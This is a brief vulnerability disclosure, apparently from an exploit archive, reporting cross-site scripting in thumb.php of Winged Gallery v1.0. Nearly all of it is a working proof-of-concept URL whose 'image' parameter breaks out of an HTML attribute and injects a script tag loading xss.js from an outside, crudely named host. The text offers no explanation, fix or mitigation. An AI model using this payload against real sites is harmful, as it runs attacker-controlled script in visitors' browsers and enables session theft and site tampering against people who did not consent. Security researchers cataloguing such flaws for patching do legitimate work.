Winged Gallery v1.0 suffers from cross site scripting
2b28ffb3f73ead59c1df5a1909f5e2aec4d49f2bd23334dafdc770f2cab1da2c
Winged Gallery v1.0
Homepage:
http://winged.info/index.php?p=gallery
XSS vuln on thumb.php:
http://example.com/gallery/thumb.php?image=data/Example+Folder/firefox+icon.jpg">''>">">"><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<'<'<'<'&size=75&type=2&w=128&h=128">''>">">">